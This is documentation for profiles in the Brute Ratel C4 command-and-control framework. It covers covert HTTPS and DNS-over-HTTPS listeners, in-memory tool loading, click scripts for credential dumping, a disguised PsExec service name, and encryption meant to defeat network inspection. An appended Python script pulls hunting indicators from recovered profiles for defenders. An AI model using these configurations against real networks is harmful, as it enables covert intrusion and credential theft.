C4 Profiles

Brute Ratel profiles provide a variety of ways to automate the configuration of the server. You can configure a server from the Commander and export the profile from the server to your local machine, or build one manually from scratch. The profiles are in JSON format, which makes them much easier to build. Everything that you configure from the Commander can be done from the JSON configuration as well. C4 profiles make an operator’s life easier by avoiding the task of building a profile over and over again, and they make migration from one server to another possible at the click of a button.

Listener Profile

Listener profiles can be written in JSON to autostart the listeners when you start the Ratel server. Only HTTP/HTTPS listeners (DOH inclusive) can be configured to autostart, since the SMB and TCP listeners are run directly on the badgers during pivoting. Below is a quick example of an HTTPS listener containing a JSON malleable profile and a DNS over HTTPS profile, which should be self-explanatory. Not all options are mandatory. When you create a new listener using the Commander, it will autogenerate these profiles and store them in memory. These can be saved offline using the ‘View Configuration’ button above the scratchpad and used later when you create another server.

{
    "listeners": {
        "Primary-Https": {
            "auth_count": 1,						// number of authentication keys
            "auth_type": false,						// false = Regular keys, true = One Time Auth keys
            "c2_authkeys": [
                "abcd@123"						// comma-separated authentication keys in an array
            ],
            "c2_uri": [
                "content.php",						// comma-separated URIs in an array
                "admin.php",
                "login.php",
                "content.js",
                "api"
            ],
            "extra_headers": {						// any extra headers in key/value format
                "Cache-Control": "no-cache",
                "Cookie": "1babbba6265ca2eba78b6",
                "Host": "test.azureedge.net",
                "Pragma": "no-cache",
                "Referer": "https://mail.microsoft.com",
                "x-pm-apiversion": "3",
                "x-pm-appversion": "Web_3.16.33",
                "x-pm-uid": "d0e1f5b0dc08202064de25a"
            },
            "host": "192.168.0.142",					// bind host to listen on
            "is_random": false,						// should be 'false'. It is usually created by the server to autogenerate keys. Reserved for future use
            "os_type": "windows",					// should be 'windows'. Reserved for future use.
            "port": "443",						// port to listen on
            "rotational_host": "192.168.0.142",				// rotational hosts separated by commas
            "ssl": true,					        // ssl enabled or disabled
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",		// useragent for the payload
            "die_offline": true,					// should be 'true' or 'false'. This kills the payload if internet connectivity is not available during the initial connection.
            "proxy": "https://192.168.0.102:8081"		        // optional proxy server for the payload to connect to, can be http or https
        },
        "Primary-DOH": {
            "auth_count": 1,                        // number of authentication keys
            "auth_type": false,                     // false = Regular keys, true = One Time Auth keys
            "c2_authkeys": [
                "abcd@123"                          // comma-separated authentication keys in an array
            ],
            "c2_uri": [
                "dns-query"                         // comma-separated URIs in an array
            ],
            "extra_headers": {                      // any extra headers in key/value format
                "Content-Type": "application/dns-message"
            },
            "host": "192.168.0.142",                // bind host to listen on
            "is_random": false,                     // should be 'false'. It is usually created by the server to autogenerate keys. Reserved for future use
            "os_type": "windows",                   // should be 'windows'. Reserved for future use.
            "port": "443",                          // port to listen on
            "dnshost": "dns1.evasionlabs.com",      // DNS hosts to be queried
            "rotational_host": "dns.google",        // rotational DNS servers separated by commas
            "idleA": "8.8.4.4",                     // IP to respond for A records request for no commands in listener bucket
            "spoofTxt": "google-site-verification=wD8N7i1JTNTkezJ49swvWW48f8_9xveREV4oB-0Hf5o",        // spoofed TXT records exposed to public
            "checkinA": "8.8.8.8",                  // IP to respond for A records request for checking in
            "ssl": true,                            // ssl enabled or disabled
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ",        // useragent for the payload
            "die_offline": true,                    // should be 'true' or 'false'. This kills the payload if internet connectivity is not available during the initial connection.
            "proxy": "https://192.168.0.102:8081"   // optional proxy server for the payload to connect to, can be http or https
        }
    }
}

Every time you create a new listener, a payload profile is created automatically and stored in the Payload Profilers section. Payload profiles can be viewed in the Commander by selecting C4 Profiler->Payload Profiler. They are stored independently of the listener profile, which means that modifying and saving a payload profile does not affect the listener config.

Payload Profiles (Ratel Server)

Payload profiles provide a variety of options to configure and build payloads. These payload configurations work independently of the Listener Profiles. This means you can edit, delete or create new profiles and use them dynamically during process injections or profile migration, or to create new executable/shellcode/dll/ps1 or service executables out of them. There are 4 types of payload profiles.

  • DOH (DNS over HTTPS)
  • HTTP/HTTPS
  • TCP
  • SMB

You can also store profiles for your backup Command and Control Center in your current C2 and use them to inject the backup-c2’s profile directly in your current payload, thus allowing you to switch C2s without needing to drop a file on disk. Below are a few examples of all the payload profiles which should be self-explanatory.

{
    "payload_config": { 								// This config is similar to that of the listeners config.
        "auto-Primary-Https": {
            "c2_auth": "abcd@123",
            "c2_uri": [
                "content.php",
                "admin.php",
                "login.php",
                "content.js",
                "api"
            ],
            "extra_headers": {
                "Cache-Control": "no-cache",
                "Cookie": "1babbba6265ca2eba78b6",
                "Host": "test.azureedge.net",
                "Pragma": "no-cache",
                "Referer": "https://mail.microsoft.com",
                "x-pm-apiversion": "3",
                "x-pm-appversion": "Web_3.16.33",
                "x-pm-uid": "d0e1f5b0dc08202064de25a"
            },
            "host": "192.168.0.142",
            "port": "443",
            "ssl": true,
            "type": "HTTP",							        // type should be HTTP for HTTP payload configurations
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
            "die_offline": true,					                // should be 'true' or 'false'. This kills the payload if internet connectivity is not available during the initial connection.
            "proxy": "https://192.168.0.102:8081"		                        // optional proxy server for the payload to connect to, can be http or https
        },
        "auto-doh-c2": {
            "c2_auth": "abcd@123",
            "c2_uri": [
                "dns-query"
            ],
            "checkinA": "8.8.8.8",
            "die_offline": false,
            "dnshost": "dns1.evasionlabs.com,dns2.evasionlabs.com",
            "extra_headers": {
                "Content-Type": "application/dns-message"
            },
            "host": "dns.google",
            "idleA": "8.8.4.4",
            "port": "443",
            "ssl": true,
            "type": "DOH",
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
        },
        "main_smb": {								// SMB payload profile example
            "c2_auth": "abcd@123",						// key to authenticate with the server. This should be the same as that of the HTTP listener
            "smb_pipe": "\\\\.\\pipe\\mynamedpipe",				// the named pipe on which to communicate over SMB
            "type": "SMB"							// type should be SMB for SMB payload configurations
        },
        "main_tcp": {								// TCP payload profile example
            "c2_auth": "abcd@123",						// key to authenticate with the server. This should be the same as that of the HTTP listener
            "host": "127.0.0.1",						// host to connect back to. This should be the IP where a badger is listening using the 'pivot_tcp' command
            "port": "10000",						        // port to connect to the badger's TCP listener
            "type": "TCP"							// type should be TCP for TCP payload configurations
        }
    }
}

Command Profile

C4 profiles allow users to configure custom commands. C4 profiles can be configured to use reflective DLLs using the register_dll command, C# PE using the register_pe command and PIC object files using the register_obj command. The register_dll command can be used to configure how a reflective DLL gets placed in memory, and whether certain strings need to be replaced before copying the DLL to memory and executing it.

Register a Reflective DLL as an internal BRc4 Command (fork and run)

The register_dll profile can be used to register your own reflective DLL as an internal command for the Ratel server. This means whenever you type your command name (boxreflect in this example), it will execute the DLL in the ‘file_path’ key (this key is local to the server) using the loadr command on the badger. These profiles will also show up in the ‘help’ section of the badger’s terminal.

{
    "register_dll": {                                                   // registers a reflective DLL as an internal command of badger
        "boxreflect": {                                                 // name of the command which you would enter in the badger's terminal to execute the dll (uses 'loadr' to execute the dll)
            "file_path": "server_confs/boxreflect.dll",                 // path of the DLL, accessible to the Ratel server
            "arch" : "x64",                                             // this can be x64 or x86 depending upon the type of your dll
            "description": "Loads a test reflective dll message box",   // description to show in the help of the badger's terminal
            "artifact": "WINAPI",                                       // artefact to show in the help of badger's terminal. (WINAPI or NA)
            "mainArgs": "NA",                                           // compulsory arguments needed for the DLL to run
            "optionalArg": "NA",                                        // optional arguments which can be supplied to the DLL
            "example": "boxcheck",                                      // example as to how to execute the DLL
            "minimumArgCount": 1,                                       // minimum count of arguments required for the DLL to run. If the argument supplied is less than this, the help would be printed to the screen
            "replace_str": {                                            // replace the below strings with respective hex values before execution. The size of the hex values should be the same as that of the strings
                "boxit": "\\x00\\x00\\x00\\x00\\x00",
                "!This program cannot ": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",
                "be run in DOS mode.": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
            }
        }
    }
}

Register a C-Sharp executable as an internal BRc4 Command (fork and run)

The register_pe profile can be used to execute C-sharp executables in the memory of a target process. The target process can be configured separately. This profile executes the C-sharp executable using the sharpreflect command in the badger.

{
    "register_pe": {                                        // registers a C# PE as an internal command of badger
        "seatbelt": {                                       // name of the command which you would enter in the badger's terminal to execute the PE (uses 'sharpreflect' to execute the PE file)
            "file_path": "server_confs/Seatbelt.exe",       // path of the PE, accessible to the Ratel server
            "description": "Runs Seatbelt C# executable",   // description to show in the help of the badger's terminal
            "artifact": "WINAPI",                           // artefact to show in the help of badger's terminal. (WINAPI or NA)
            "mainArgs": "NA",                               // compulsory arguments needed for the PE to run
            "optionalArg": "NA",                            // optional arguments which can be supplied to the PE
            "example": "seatbelt",                          // example as to how to execute the PE
            "minimumArgCount": 1                            // minimum count of arguments required for the PE to run. If the argument supplied is less than this, the help would be printed to the screen
        }
    }
}

Register a C-Sharp executable as an internal BRc4 Command to be run inline (No fork and run)

This command is similar to the register_pe profile, except that this is used alongside the sharpinline command to run the C-Sharp executable in the current process itself.

{
    "register_pe_inline": {                                 // registers a C# PE as an internal command of badger
        "seatbelt": {                                       // name of the command which you would enter in the badger's terminal to execute the PE (uses 'sharpinline' to execute the PE file)
            "file_path": "server_confs/Seatbelt.exe",       // path of the PE, accessible to the Ratel server
            "description": "Runs Seatbelt C# executable",   // description to show in the help of the badger's terminal
            "artifact": "WINAPI",                           // artefact to show in the help of badger's terminal. (WINAPI or NA)
            "mainArgs": "NA",                               // compulsory arguments needed for the PE to run
            "optionalArg": "NA",                            // optional arguments which can be supplied to the PE
            "example": "seatbelt",                          // example as to how to execute the PE
            "minimumArgCount": 1                            // minimum count of arguments required for the PE to run. If the argument supplied is less than this, the help would be printed to the screen
        }
    }
}

Register a BOF as an internal BRc4 Command to be run inline (No fork and run)

The register_obj profile is used to run Badger Object Files (BOFs) in memory. The BOFs are executed using the coffexec command in the badger.

{
    "register_obj": {                                       // registers an object file as an internal command of badger
        "o_getprivs": {                                     // name of the command which you would enter in the badger's terminal to execute the object file
            "arch" : "x64",                                 // this can be x64 or x86 depending upon the type of your object file
            "file_path": "server_confs/getprivs.o",         // path of the object file, accessible to the Ratel server
            "description": "Get privilege of current user", // description to show in the help of the badger's terminal
            "artifact": "WINAPI",                           // artefact to show in the help of badger's terminal. (WINAPI or NA)
            "mainArgs": "NA",                               // compulsory arguments needed for the object file to run
            "optionalArg": "NA",                            // optional arguments which can be supplied to the object file
            "example": "o_getprivs",                        // example as to how to execute the object file
            "minimumArgCount": 1                            // minimum count of arguments required for the object file to run. If the argument supplied is less than this, the help would be printed to the screen
        }
    }
}

Badger Profile

NOTE: Badger profiles should not be created manually. Only the pre-created ones from the server should be used.

Badger profiles are just configurations of badgers which were at some point loaded into the server. Whenever a badger connects to the server for the first time, the server stores a bunch of metadata in memory to identify the connection for later use. This metadata can be extracted from the server and stored in a configuration file. If for some reason you want to kill and start the server again without losing the badgers, you can use the ‘-b’ command-line argument with the JSON file containing the configuration of the badgers. This will restore all the metadata and the tokens used by the badgers for authentication to the server. A badger profile should look like this:

{
    "badgers": {
        "b-0": {                                            // id of the badger
            "b_bld": "18363",                               // host os build version
            "b_c2": "https://192.168.0.142:443",            // http or https port and domain for your payload
            "b_c2_id": "Primary-Https",                     // name of your listener
            "b_cookie": "QQD7QGSMCCTV66OU5C8GAQTQNTU8H7MD", // cookie to authenticate from
            "b_h_name": "DESKTOP-G15FRLS",                  // hostname of the badger
            "b_l_ip": "192.168.0.142",                      // external IP of badger
            "b_p_name": "Z:\\documents\\badger.exe",        // path of badger
            "b_pid": "7268",                                // pid of badger
            "b_seen": "09-05-2021 09:14:19",                // last seen date of badger
            "b_uid": "vendetta",                            // username of badger
            "b_wver": "10.0",                               // host os version
            "is_pvt": false,                                // this should be false, unless the badger is a pivot badger (smb or tcp)
            "pipeline": "Direct",                           // this should be Direct unless the badger is a pivot badger
            "pvt_master": ""                                // this should be empty, unless the badger is a pivot badger
        }
    }
}

Badger configurations are stored in the logs directory under the name badger_tokens.conf. You can restore the badgers using the below command:

./brute-ratel-linx64 -ratel -c server_confs/c4profile.conf -b logs/badger_tokens.conf

Other Profiles

The C4 profile can hold a good deal of other information for automation, other than the profiles seen in the previous sections. Below are sample configurations which explain the nature of each of these profiles:

Operators

When using C4 profiles, you need to provide an admin username and password in the C4 profile. They can be added using the JSON configuration below. Similar to adding admin operators, multiple non-admin operators can also be added to the server for collaboration.

{
    "admin_list": {
        "admin": "pass123"
    },
    "user_list": {
        "operator1": "password123",
        "operator2": "password456"
    }
}

Profile Autosave

Brute Ratel server’s configuration can be viewed and backed up offline. This comes in handy if you want to start another Ratel Server instance but don’t want to build a new C4 Profile. The autosave option, when enabled, will automatically save the profile to disk and update it every 30 seconds.

{
    "auto_save": true
}

This can also be enabled from the Commander by clicking the ‘Autosave Disabled’ button.

Click Scripts

Click Scripting is a feature which allows operators to automate execution of bulk commands. Unlike the ‘Autoruns’ feature, which lets an operator auto-execute several commands on the first connection of a badger, Click Scripts are lists of commands which can be chained together to execute one after the other at any point in time. This helps with automated execution of commands belonging to different Tactics and Techniques of MITRE ATT&CK, which can be chained together during a Purple Team engagement. Below is an example of some discovery-based commands which are grouped into a single click script called ‘Discovery’. This script can also be created from the Commander by selecting C4 Profiler->Clickscripts. To run these clickscripts, right click a badger, load a clickscript and click the run button.

{
    "click_script": {
        "Credential Dumping": [
            "samdump",
            "shadowclone",
            "dcsync"
        ],
        "Discovery": [
            "id",
            "pwd",
            "ipstats",
            "psreflect echo $psversiontable",
            "net users",
            "scquery"
        ]
    }
}

Autoruns

Brute Ratel can automate initial command execution for badgers using the autoruns profile. Commands added to the autoruns profile will be auto executed on every badger whenever they connect for the first time. These autoruns can be configured either by adding them manually in Commander or via the profile below.

{
    "autoruns": [
        "sleep 60 30",
        "set_child werfault.exe",
        "id",
        "userinfo",
        "dcenum"
    ]
}

C2 Handler

The C2 handler profile starts the handler on the provided IP and port. This is where the Commander connects over websocket to send and receive requests from the server (your API server port).

{
    "c2_handler": "0.0.0.0:8443"
}

Encryption In Transit

Brute Ratel uses a custom encryption algorithm to encrypt the data on the network between badgers and the C4 server. This encryption is performed using either a random key or one provided by the operator. If an operator does not provide an encryption key, the server generates it randomly. This layer of encryption sits below the SSL layer. If a network-based EDR or a network intrusion detection system like Zeek/Bro tries to inspect the traffic using SSL decryption, the inner layer would still be encrypted and appear as garbage to it. This encryption key can be provided inside the C4 profile as shown below.

{
    "comm_enc_key": "WeiJeeWeiCufae2y"
}

Credentials

Pre-existing credentials (breached credentials) or credentials harvested during phishing can be used to create Windows Access Tokens for lateral movement. They can be created using the make_token command or added to the server using a profile or from the Commander. Once added, an operator can select this from the Commander to create a local or network token for lateral movement.

{
    "credentials": [
        {
            "creddomain": "bruteratel.corp",
            "crednote": "Domain Admin Password",
            "credpass": "admin@123",
            "creduser": "administrator"
        },
        {
            "creddomain": "jupiter.solar.corp",
            "crednote": "Domain Admin Password",
            "credpass": "jupiter@123",
            "creduser": "administrator"
        }
    ]
}

PsExec

The PsExec profile can be used to configure the service name and description for remote service creation with the psexec command. This can also be changed from the C4 Profiler->Psexec Config option in the Commander.

{
    "psexec_config": {
        "psexec_svc_desc": "Manages universal application core process that in Windows 8 and continues in Windows 10.",
        "psexec_svc_name": "TransactionBrokerService"
    }
}

SSL Profile

The SSL profile specifies the path of the SSL certificate and key used to start the HTTPS/DOH Listeners and the Websocket Handler for the Commander.

{
    "ssl_cert": "cert.pem",
    "ssl_key": "key.pem"
}

Webhook

Webhooks in Brute Ratel are a method of forwarding the responses of the badgers to a self-hosted SSL server using HTTPS callbacks. These callbacks may be maintained, modified, and managed by operators of BRc4. The BRc4 listeners support webhooks for two types of Badger Comms. This can be enabled by right clicking a listener and selecting the ‘Webhook’ option, or by using a profile as follows. Webhooks, when combined with the automation of the API server, can be extremely powerful for parsing the response of the badger and sending another automated command in return using the API.

{
    "webhook_listener": {                               // this config enables webhook listener for the configured C2
        "myc2": {                                       // name of the listener to enable webhook for
            "badger_init": true,                        // example of enabling notifications for initial connections from badger via webhook callbacks
            "badger_log": false,                        // example of enabling full badger logs for initial connections from badger via webhook callbacks
            "webhook_host": "https://localhost:9443"    // webhook listener host ip, port and URI if any
        }
    }
}

Sample Profile

Below is an example of a sample profile:

{
    "admin_list": {
        "admin": "admin@123"
    },
    "auto_save": false,
    "click_script": {
        "Credential Dumping": [
            "samdump",
            "shadowclone",
            "dcsync"
        ],
        "Discovery": [
            "id",
            "pwd",
            "ipstats",
            "psreflect echo $psversiontable",
            "net users",
            "scquery"
        ]
    },
    "autoruns": [
        "set_child searchprotocolhost.exe",
        "sleep 1"
    ],
    "c2_handler": "0.0.0.0:8443",
    "comm_enc_key": "WeiJeeWeiCufae2y",
    "credentials": [
        {
            "creddomain": "darkvortex.corp",
            "crednote": "Domain Admin Password",
            "credpass": "admin@123",
            "creduser": "administrator"
        }
    ],
    "listeners": {
        "json-c2": {
            "append": "\"}",
            "auth_count": 1,
            "auth_type": false,
            "c2_authkeys": [
                "abcd@123"
            ],
            "c2_uri": [
                "en/ec2/pricing/",
                "?locale=en"
            ],
            "die_offline": false,
            "extra_headers": {
                "content-type": "application/json"
            },
            "host": "172.16.219.1",
            "is_random": true,
            "os_type": "windows",
            "port": "443",
            "prepend": "{\"channel\":\"",
            "rotational_host": "172.16.219.1",
            "ssl": true,
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
            "proxy": "https://192.168.0.150:8081"
        },
        "xml-c2": {
            "append": "</description>\n    </add>\n</batch>\n",
            "auth_count": 1,
            "auth_type": false,
            "c2_authkeys": [
                "abcd@123"
            ],
            "c2_uri": [
                "previous-versions/windows",
                "latest/developerguide/documents-batch-xml.html"
            ],
            "die_offline": false,
            "extra_headers": {
                "Content-Type": "application/xhtml+xml"
            },
            "host": "172.16.219.1",
            "is_random": true,
            "os_type": "windows",
            "port": "80",
            "prepend": "<?xml version=\"1.0\"?>\n<batch>\n    <add id=\"tt0484562\">\n        <author>Gambardella, Matthew</author>\n        <title>XML Developer's Guide</title>\n        <genre>Computer</genre>\n        <price>44.95</price>\n        <publish_date>2000-10-01</publish_date>\n        <description>",
            "rotational_host": "172.16.219.1",
            "ssl": true,
            "useragent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
        },
        "doh-c2": {
            "auth_count": 1,
            "auth_type": false,
            "c2_authkeys": [
                "abcd@123"
            ],
            "c2_uri": [
                "dns-query"
            ],
            "extra_headers": {
                "Content-Type": "application/dns-message"
            },
            "checkinA": "8.8.8.8",
            "die_offline": false,
            "dnshost": "dns1.evasionlabs.com,dns2.evasionlabs.com",
            "rotational_host": "dns.google",
            "host": "172.16.219.1",
            "idleA": "8.8.4.4",
            "spoofTxt": "google-site-verification=wD8N7i1JTNTkezJ49swvWW48f8_9xveREV4oB-0Hf5o",
            "is_random": true,
            "os_type": "windows",
            "port": "53",
            "ssl": true,
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
        }
    },
    "payload_config": {
        "main_smb": {
            "c2_auth": "abcd@123",
            "smb_pipe": "\\\\.\\pipe\\mynamedpipe",
            "type": "SMB"
        },
        "main_tcp": {
            "c2_auth": "abcd@123",
            "host": "127.0.0.1",
            "port": "10000",
            "type": "TCP"
        }
    },
    "psexec_config": {
        "psexec_svc_desc": "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether universal apps installed from the Windows Store are declaring all of their permissions, like being able to access your telemetry, location or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user.",
        "psexec_svc_name": "TransactionBrokerService"
    },
    "ssl_cert": "cert.pem",
    "ssl_key": "key.pem",
    "user_list": {
        "brute": "brute123",
        "ratel": "ratel123"
    },
    "register_obj": {
        "boftest64": {
            "arch": "x64",
            "file_path": "server_confs/sample_bof/decltest64.o",
            "description": "Sample BOF file to show x64 capabilities",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "decltest64",
            "minimumArgCount": 1
        },
        "boftest86": {
            "arch": "x86",
            "file_path": "server_confs/sample_bof/decltest86.o",
            "description": "Sample BOF file to show x86 capabilities",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "decltest86",
            "minimumArgCount": 1
        }
    },
    "register_pe": {
        "seatbelt": {
            "file_path": "server_confs/Seatbelt.exe",
            "description": "Runs Seatbelt C# executable",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "seatbelt",
            "minimumArgCount": 1
        }
    },
    "register_pe_inline": {
        "monologue": {
            "file_path": "server_confs/InternalMonologue.exe",
            "description": "Runs InternalMonologue C# executable",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "monologue",
            "minimumArgCount": 1
        }
    },
    "register_dll": {
        "boxreflect": {
            "arch": "x64",
            "file_path": "server_confs/boxreflect.dll",
            "description": "Loads a test reflective dll message box",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "boxcheck",
            "minimumArgCount": 1,
            "replace_str": {
                "boxit": "\\x00\\x00\\x00\\x00\\x00",
                "!This program cannot ": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",
                "be run in DOS mode.": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
            }
        }
    },
    "webhook_listener": {
        "json-c2": {
            "badger_init": false,
            "badger_log": false,
            "webhook_host": "https://localhost:9443"
        }
    }
}
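
Added example (not part of the Brute Ratel documentation or the project's code): when a C4 profile is recovered during incident response, the fields documented above map directly onto hunting indicators. The Python below strips the `//` annotations used on this page, then collects callback endpoints, URIs, user agents, Host headers, DoH domains, named pipes and the PsExec service name. The function names, the constructed sample (values taken from this page's examples) and the reading of rotational_host as the callback host are assumptions.

```python
import json

def strip_line_comments(text):
    """Remove // comments that sit outside JSON string literals."""
    out, in_str, esc, i = [], False, False, 0
    while i < len(text):
        ch = text[i]
        if in_str:
            out.append(ch)
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            out.append(ch)
        elif text.startswith("//", i):
            while i < len(text) and text[i] != "\n":
                i += 1          # drop the comment, keep the newline
            continue
        else:
            out.append(ch)
        i += 1
    return "".join(out)

def _csv(value):
    """rotational_host and dnshost hold comma-separated values."""
    return [v.strip() for v in str(value or "").split(",") if v.strip()]

def extract_indicators(profile_text):
    profile = json.loads(strip_line_comments(profile_text))
    keys = ("endpoints", "doh_resolvers", "doh_domains", "uris",
            "user_agents", "host_headers", "named_pipes", "service_names")
    found = {k: set() for k in keys}
    entries = list(profile.get("listeners", {}).values())
    entries += list(profile.get("payload_config", {}).values())
    for cfg in entries:
        if "smb_pipe" in cfg:
            # Hunt with pipe-creation telemetry (e.g. Sysmon events 17/18).
            found["named_pipes"].add(cfg["smb_pipe"])
            continue
        if cfg.get("type") == "TCP":
            continue  # pivot link between badgers, not a server endpoint
        scheme = "https" if cfg.get("ssl") else "http"
        # Assumption: listeners name callback hosts in rotational_host,
        # payload configs name them in host.
        hosts = _csv(cfg.get("rotational_host")) or _csv(cfg.get("host"))
        is_doh = "dnshost" in cfg
        for h in hosts:
            url = f"{scheme}://{h}:{cfg.get('port', '')}"
            # For DoH the host is a public resolver: blocking it is noisy,
            # so keep it apart from the queried domains, which are specific.
            found["doh_resolvers" if is_doh else "endpoints"].add(url)
        found["doh_domains"].update(_csv(cfg.get("dnshost")))
        if not is_doh:
            found["uris"].update("/" + u.lstrip("/") for u in cfg.get("c2_uri", []))
        if cfg.get("useragent"):
            found["user_agents"].add(cfg["useragent"].strip())
        for name, val in cfg.get("extra_headers", {}).items():
            if name.lower() == "host":
                found["host_headers"].add(val)  # may differ from the endpoint
    svc = profile.get("psexec_config", {}).get("psexec_svc_name")
    if svc:
        # Service installs show up in Windows System log event 7045.
        found["service_names"].add(svc)
    return {k: sorted(v) for k, v in found.items()}

# Constructed sample: a trimmed profile built from the values on this page.
SAMPLE_PROFILE = r'''
{
    "listeners": {
        "Primary-Https": {
            "c2_uri": ["content.php", "api"],       // comma-separated URIs
            "extra_headers": {"Host": "test.azureedge.net", "Pragma": "no-cache"},
            "host": "192.168.0.142",                // bind host to listen on
            "port": "443",
            "rotational_host": "192.168.0.142",
            "ssl": true,
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ",
            "proxy": "https://192.168.0.102:8081"   // optional proxy
        },
        "Primary-DOH": {
            "c2_uri": ["dns-query"],
            "host": "192.168.0.142",
            "port": "443",
            "dnshost": "dns1.evasionlabs.com,dns2.evasionlabs.com",
            "rotational_host": "dns.google",
            "ssl": true
        }
    },
    "payload_config": {
        "main_smb": {"smb_pipe": "\\\\.\\pipe\\mynamedpipe", "type": "SMB"},
        "main_tcp": {"host": "127.0.0.1", "port": "10000", "type": "TCP"}
    },
    "psexec_config": {"psexec_svc_name": "TransactionBrokerService"}
}
'''

if __name__ == "__main__":
    for kind, values in extract_indicators(SAMPLE_PROFILE).items():
        print(f"{kind}: {values}")
```

A Host header that does not match the endpoint it is sent to, as in the HTTPS listener example, is worth its own proxy-log query, since neither value alone stands out.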